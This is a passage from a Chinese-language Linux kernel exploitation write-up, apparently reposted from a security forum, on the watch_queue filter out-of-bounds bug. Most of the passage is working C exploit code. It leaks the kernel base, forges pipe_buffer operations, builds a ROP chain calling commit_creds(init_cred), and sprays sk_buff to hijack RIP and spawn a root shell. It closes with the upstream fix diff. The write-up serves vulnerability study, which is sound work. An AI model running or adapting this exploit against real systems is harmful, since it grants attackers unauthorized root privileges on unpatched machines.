                        pipe_buf_ptr->ops);
                kernel_offset = pipe_buf_ptr->ops - ANON_PIPE_BUF_OPS;
                kernel_base = 0xffffffff81000000 + kernel_offset;
            }
        }
    }

    printf("\033[32m\033[1m[+] kernel base: \033[0m%llx \033[32m\033[1moffset: \033[0m%llx\n", 
            kernel_base, kernel_offset);

    /*
     * Step.V
     * hijack the ops of pipe_buffer
     * free all pipe to trigger fake ptr
     * so that we hijack the RIP
     * construct a ROP on pipe_buffer
     */
    puts("\n\033[34m\033[1m[*] Step.V hijack the ops of pipe_buffer, gain root privilege\033[0m");

    puts("[*] pre-construct data in userspace...");
    pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg;
    pipe_buf_ptr->ops = victim_addr;

    ops_ptr = (struct pipe_buf_operations *) fake_secondary_msg;
    ops_ptr->release = 0xffffffff8183b4d3 + kernel_offset;// push rsi ; pop rsp ; add [rbp-0x3d],bl ; ret
    ops_ptr->confirm = 0xffffffff81689ea4 + kernel_offset;// pop rdx ; pop r13 ; pop rbp ; ret

    rop_idx = 0;
    rop_chain = (uint64_t*) &fake_secondary_msg[0x20];
    rop_chain[rop_idx++] = kernel_offset + POP_RDI_RET;
    rop_chain[rop_idx++] = kernel_offset + INIT_CRED;
    rop_chain[rop_idx++] = kernel_offset + COMMIT_CREDS;
    rop_chain[rop_idx++] = kernel_offset + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
    rop_chain[rop_idx++] = *(uint64_t*) "arttnba3";
    rop_chain[rop_idx++] = *(uint64_t*) "arttnba3";
    rop_chain[rop_idx++] = getRootShell;
    rop_chain[rop_idx++] = user_cs;
    rop_chain[rop_idx++] = user_rflags;
    rop_chain[rop_idx++] = user_sp;
    rop_chain[rop_idx++] = user_ss;

    puts("[*] spray sk_buff to hijack pipe_buffer...");
    if (spraySkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to spray sk_buff!");

    puts("[*] trigger fake ops->release to hijack RIP...");
    for (int i = 0; i < PIPE_NUM; i++)
    {
        close(pipe_fd[i][0]);
        close(pipe_fd[i][1]);
    }
}

运行即可完成提权

该漏洞在内核主线的这个 commit 中被修复，这个 commit 增加的修改比较多，我们主要关注对于该漏洞其改变的部分：

@@ -320,7 +319,7 @@ long watch_queue_set_filter(struct pipe_inode_info *pipe,
            tf[i].info_mask & WATCH_INFO_LENGTH)
            goto err_filter;
        /* Ignore any unknown types */
-       if (tf[i].type >= sizeof(wfilter->type_filter) * 8)
+       if (tf[i].type >= WATCH_TYPE__NR)
            continue;
        nr_filter++;
    }
@@ -336,7 +335,7 @@ long watch_queue_set_filter(struct pipe_inode_info *pipe,

    q = wfilter->filters;
    for (i = 0; i < filter.nr_filters; i++) {
-       if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
+       if (tf[i].type >= WATCH_TYPE__NR)
            continue;

        q->type         = tf[i].type;

修复了前后判定不一致的问题
将 type 的范围限定为 WATCH_TYPE__NR（值为 2）

笔者个人认为这个修复还是比较成功的

文章来源: https://xz.aliyun.com/t/11168
如有侵权请联系:admin#unsafe.sh